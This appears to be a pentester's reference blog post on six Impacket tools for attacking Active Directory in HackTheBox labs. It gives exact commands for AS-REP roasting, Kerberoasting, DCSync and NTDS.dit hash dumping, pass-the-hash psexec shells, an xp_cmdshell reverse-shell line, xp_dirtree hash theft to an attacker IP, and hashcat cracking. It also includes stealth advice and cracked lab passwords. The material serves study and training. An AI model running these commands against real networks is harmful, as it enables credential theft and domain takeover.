Impacket is a collection of Python tools for working with network protocols. In practice, for AD pentesting, I use maybe 6 of them constantly. This is a reference for those 6 — what they do, when to use them, and the exact commands I run.

Installed on Kali by default. Every tool is prefixed with impacket-.

impacket-GetNPUsers — AS-REP Roasting

What it does: Finds accounts with Kerberos pre-authentication disabled and dumps their AS-REP hashes. No credentials required — you just need a list of valid usernames.

When to use it: First thing I try on any AD box. Before brute-forcing, before anything else. If pre-auth is disabled on an account, you get the hash for free.

Basic Usage

# With a username list (no creds needed)
impacket-GetNPUsers DOMAIN.local/ -dc-ip $ip -usersfile users.txt -format hashcat -outputfile asrep.txt

# With valid creds (enumerates all vulnerable users automatically)
impacket-GetNPUsers DOMAIN.local/user:'password' -dc-ip $ip -request -format hashcat -outputfile asrep.txt

Key Flags

FlagWhat it does
-usersfileList of usernames to test (one per line)
-format hashcatOutput in hashcat format (mode 18200). Use -format john for john
-outputfileSave hashes to file
-requestActually request the TGT (needed when using creds)
-dc-ipTarget DC IP

Cracking the Hash

hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt

Gotchas

  • No creds variant needs a username list. You have to enumerate usernames first — SMB null session, LDAP, kerbrute, whatever.
  • With creds variant finds all vulnerable accounts automatically. Don’t need a username list.
  • When saving hashes with echo, use single quotes. Double quotes corrupt the $ characters in the hash. Wasted time debugging this on Forest.

Where I Used It

  • Forest — AS-REP Roasted svc-alfresco with no creds. Got the hash, cracked it to s3rvice. That was the entire foothold.
  • Blackfield — Same thing. Harvested ~300 usernames from the profiles$ SMB share, fed them to GetNPUsers, got support account’s hash.

impacket-GetUserSPNs — Kerberoasting

What it does: Finds accounts with SPNs (Service Principal Names) set and requests their TGS tickets. The ticket is encrypted with the account’s password hash — crack the ticket, crack the password.

When to use it: Once you have any valid domain credentials. Any authenticated user can Kerberoast. This is always worth running.

Basic Usage

# Enumerate SPNs only
impacket-GetUserSPNs DOMAIN.local/user:'password' -dc-ip $ip

# Enumerate AND request tickets
impacket-GetUserSPNs DOMAIN.local/user:'password' -dc-ip $ip -request -outputfile kerberoast.txt

Key Flags

FlagWhat it does
-requestActually request the TGS tickets (without this, it just lists SPNs)
-outputfileSave hashes to file
-dc-ipTarget DC IP

Cracking the Hash

hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt
# or
john kerberoast.txt --wordlist=/usr/share/wordlists/rockyou.txt

Gotchas

  • You need valid creds first. Unlike AS-REP Roasting, Kerberoasting requires authentication.
  • Machine accounts and managed service accounts usually have random 128-char passwords. Focus on user accounts with SPNs — those are the ones with crackable passwords.
  • -request is easy to forget. Without it you just get a list of SPNs, not the actual hashes.

Where I Used It

  • Active — After getting SVC_TGS creds from GPP, Kerberoasted the Administrator account. SPN was active/CIFS:445. Cracked to Ticketmaster1968. Game over.

impacket-secretsdump — DCSync, SAM, NTDS.dit

What it does: Dumps credentials. This tool does multiple things depending on what you feed it:

  • Remote DCSync — mimics a domain controller replication request to pull all domain hashes
  • Local SAM dump — extracts hashes from SAM + SYSTEM registry hives
  • Local NTDS.dit dump — extracts hashes from the AD database file

Remote DCSync

# With password
impacket-secretsdump DOMAIN.local/user:'password'@$ip

# With NTLM hash (pass-the-hash)
impacket-secretsdump DOMAIN.local/user@$ip -hashes :NTLM_HASH

Requires DCSync rights — meaning Replicating Directory Changes + Replicating Directory Changes All. Domain Admins have this by default. On Forest, I granted these rights to svc-alfresco via WriteDACL abuse before running secretsdump.

Local NTDS.dit Dump

impacket-secretsdump -ntds ntds.dit -system system LOCAL

When you’ve already grabbed the NTDS.dit and SYSTEM hive files (via VSS snapshot, robocopy, whatever), this parses them offline. No network connection needed.

Key Flags

FlagWhat it does
-ntdsPath to NTDS.dit file
-systemPath to SYSTEM registry hive
-hashesPass-the-hash authentication (:NTLM_HASH format — empty LM hash)
-just-dc-ntlmOnly dump NTLM hashes (faster, less noisy)
-just-dc-user USEROnly dump a specific user
LOCALParse local files instead of connecting remotely

Gotchas

  • Remote DCSync is loud. It generates specific Windows events (4662 with replication GUIDs). In a real engagement, SOC analysts (like former me) would flag this. Use -just-dc-ntlm or -just-dc-user to minimize noise.
  • The hash format in the output is LM:NTLM. For pass-the-hash you only need the NTLM part (after the second colon).
  • For local parsing, you need both NTDS.dit and SYSTEM. SYSTEM contains the boot key needed to decrypt the hashes.

Where I Used It

  • Forest — Remote DCSync after granting svc-alfresco DCSync rights via WriteDACL. impacket-secretsdump htb.local/svc-alfresco:'s3rvice'@$ip pulled the Administrator NTLM hash.
  • Blackfield — Local NTDS.dit dump. Grabbed ntds.dit + SYSTEM via VSS snapshot and robocopy /b, then impacket-secretsdump -ntds ntds.dit -system system LOCAL. Got every hash in the domain.

impacket-psexec — Shell with Creds

What it does: Gives you a SYSTEM shell on a remote Windows box using valid credentials. Works over SMB (port 445). Uploads a service binary, creates a Windows service, starts it, gives you a shell, cleans up on exit.

Basic Usage

# With password
impacket-psexec DOMAIN.local/Administrator:'password'@$ip

# With NTLM hash
impacket-psexec DOMAIN.local/Administrator@$ip -hashes :NTLM_HASH

Key Flags

FlagWhat it does
-hashesPass-the-hash (:NTLM_HASH format)
-target-ipUseful when hostname resolution is weird

Gotchas

  • Requires admin-level creds and write access to ADMIN$ or C$ shares. Regular domain user creds won’t work.
  • Creates a Windows service — this is detectable. AV/EDR might flag it. For OSCP, doesn’t matter. For real engagements, consider alternatives like evil-winrm (WinRM, port 5985) or impacket-wmiexec.
  • The shell drops you as NT AUTHORITY\SYSTEM, not as the user you authenticated with.
  • If it hangs or fails, the service might not have been cleaned up. Subsequent attempts might fail until the service is removed.

Alternatives

ToolProtocolStealthNotes
impacket-psexecSMB (445)LowCreates a service, SYSTEM shell
impacket-wmiexecWMI (135)MediumNo service creation, runs as the user
impacket-smbexecSMB (445)MediumUses a service but differently
evil-winrmWinRM (5985)HigherPowerShell, needs WinRM enabled

Where I Used It

  • Activeimpacket-psexec active.htb/Administrator:'Ticketmaster1968'@$ip for the final shell after Kerberoasting.

impacket-mssqlclient — MSSQL Access

What it does: Interactive MSSQL client. Connect to Microsoft SQL Server, run queries, enable and use xp_cmdshell for OS command execution.

Basic Usage

# Windows authentication
impacket-mssqlclient user:'password'@$ip -windows-auth

# SQL authentication (default)
impacket-mssqlclient user:'password'@$ip

Built-in Commands

Once connected, these are the key commands:

-- Check if you're sysadmin
SELECT IS_SRVROLEMEMBER('sysadmin')

-- Enable xp_cmdshell (sysadmin only)
enable_xp_cmdshell

-- Run OS commands
xp_cmdshell 'whoami'

-- Reverse shell
xp_cmdshell 'powershell -e <BASE64_PAYLOAD>'

-- Steal NTLMv2 hash (works even without sysadmin)
xp_dirtree '\\YOUR_IP\share'

Key Flags

FlagWhat it does
-windows-authUse Windows/domain authentication instead of SQL auth
-portCustom port if MSSQL isn’t on 1433

Gotchas

  • -windows-auth matters. SQL auth and Windows auth are different. If one fails, try the other. On Querier, the connection failed without -windows-auth.
  • Passwords with $ need single quotes in bash. 'PcwTWTHRwryjc$c6' works. "PcwTWTHRwryjc$c6" doesn’t — bash interprets $c6 as a variable and corrupts the password.
  • enable_xp_cmdshell requires sysadmin role. If your user isn’t sysadmin, the command silently fails or errors. Use xp_dirtree + Responder to steal the service account’s NTLMv2 hash instead.
  • xp_dirtree + Responder is the fallback when xp_cmdshell is denied. The SQL server makes an SMB connection to your machine and Responder catches the hash. Hashcat mode 5600 for NTLMv2.

Where I Used It

  • Querier — Connected with VBA macro creds using -windows-auth. Reporting user couldn’t run xp_cmdshell, so I used xp_dirtree + Responder to steal the service account’s NTLMv2 hash. Cracked it, reconnected as sysadmin, enabled xp_cmdshell, got a shell.

impacket-smbclient — SMB File Access

What it does: Interactive SMB client for browsing and downloading files from shares. Similar to smbclient from Samba but uses Impacket’s authentication stack.

Basic Usage

# With password
impacket-smbclient DOMAIN.local/user:'password'@$ip

# With NTLM hash
impacket-smbclient DOMAIN.local/user@$ip -hashes :NTLM_HASH

# Null session
impacket-smbclient DOMAIN.local/''@$ip -no-pass

Key Commands

shares          # List available shares
use SHARE_NAME  # Connect to a share
ls              # List files
get file.txt    # Download a file
cd directory    # Change directory

Gotchas

  • I usually use smbclient (the Samba one) or nxc smb --shares for initial enumeration. Impacket’s smbclient is useful when I need Impacket’s authentication (pass-the-hash, Kerberos tickets).
  • For large file downloads, smbclient from Samba is more reliable. Impacket’s version can choke on big files.

Quick Reference — When to Use What

SituationToolNeeds Creds?
Check for AS-REP Roastable usersimpacket-GetNPUsersNo (with user list)
Check for Kerberoastable usersimpacket-GetUserSPNsYes
Dump all domain hashes (DCSync)impacket-secretsdumpYes (DCSync rights)
Parse NTDS.dit offlineimpacket-secretsdump -ntds ... LOCALNo
Get a SYSTEM shellimpacket-psexecYes (admin)
Connect to MSSQLimpacket-mssqlclientYes
Browse SMB sharesimpacket-smbclientDepends

My AD Recon Order

This is roughly the order I run these tools on an AD box:

  1. GetNPUsers — AS-REP Roast first. No creds needed. Free hashes if anything is vulnerable.
  2. GetUserSPNs — Kerberoast once I have any valid creds.
  3. secretsdump — DCSync if I get Domain Admin or DCSync rights.
  4. psexec — Final shell with the admin hash or password.

Everything else (mssqlclient, smbclient) gets used when the box calls for it.

The pattern across every AD box I’ve done: enumerate users → AS-REP Roast → get first creds → BloodHound → find the path → walk the path → secretsdump → psexec → done.